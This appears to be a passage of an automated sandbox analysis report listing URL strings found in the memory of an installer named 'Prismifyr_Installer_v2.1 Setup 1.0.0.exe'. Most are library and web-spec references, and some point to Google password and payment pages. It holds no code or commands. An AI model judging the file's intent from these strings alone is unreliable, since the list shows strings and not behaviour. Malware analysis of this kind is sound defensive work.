Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/mozilla-central/file/tip/netwerk/base/nsURLParsers.cpp
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hsivonen.fi/encoding-menu/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://llvm.org/svn/llvm-project/cfe/trunk/lib/Lex/HeaderMap.cpp
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ltp.sourceforge.net/coverage/lcov/geninfo.1.php
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://no-color.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_exists_path_callback)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_existssync_path)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_read_fd_buffer_offset_length_position_callback)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_write_fd_buffer_offset_length_position_callback)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_writefile_file_data_options_callback)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_writefile_file_data_options_callback).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_writefilesync_file_data_options)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_writefilesync_file_data_options).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/util.html#util_util_promisify_original)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v20.18.0/node-v20.18.0-headers.tar.gz
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v20.18.0/node-v20.18.0.tar.gz
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v20.18.0/node-v20.18.0.tar.gzhttps://nodejs.org/download/release
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v20.18.0/win-x64/node.lib
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspector
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspectorFor
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.ico
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.icofaviconUrldevtoolsFrontendUrldevtoolsFrontendUr
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://npm.im/$
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://openjsf.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.com
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2464652978.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.comGoogle
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.comGoogle-tilisi
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.comcuenta
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pay.google.com/authentication
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/billing
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/billinghttps://google.com/payhttps://android.com/payhttps://pay.google.com/a
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://polymer-library.polymer-project.org
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/gyp-next)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/pyparsing
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/six/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.python.org/pypi/pyfakefs
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.python.org/pypi/webapp2
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://quiche.googlesource.com/quiche
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://registry.npmjs.org/bcrypt/0.7.5
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://registry.npmjs.org/bindings/1.0.0
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semver.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/site/gaviotachessuser/Home/endgame-tablebases-1
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sizzlejs.com/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://skia.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://source.corp.google.com/piper///depot/google3/third_party/tamachiyomi/README.md
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/forum/forumpost/206d99a16dd9212f
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/forum/forumpost/51e6959f61
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/forum/forumpost/68d284c86b082c3e
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/forum/forumpost/726219164b
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://streams.spec.whatwg.org/#example-manual-write-with-backpressure
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461709634.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463431471.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2465750451.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470168099.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2464843563.0000000005948000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463544080.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473941850.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2466551233.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472419715.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462040884.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472028493.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461709634.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463431471.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2465750451.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470168099.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463544080.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473941850.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2466551233.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472419715.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461642034.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462040884.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472028493.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462894354.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2464652978.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869?hl=es
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://swiftshader.googlesource.com/SwiftShader
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#eqn-modulo
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-defineownproperty-p-de
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-getownproperty-p
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-getprototypeof
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-ownpropertykeys
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#table-typeof-operator-results
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc1928#section-3
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5234#appendix-B.1
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#dom-urlsearchparams-urlsearchparams
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://v8.dev/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/aria/#aria-hidden.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/aria/#aria-hidden.Blocked
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/aria/#aria-hidden.ChildrenChangedWithCleanLayoutAccessibility
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/manifest/#installability-signals
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/manifest/#installability-signalsThe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/uievents/#legacy-event-types)
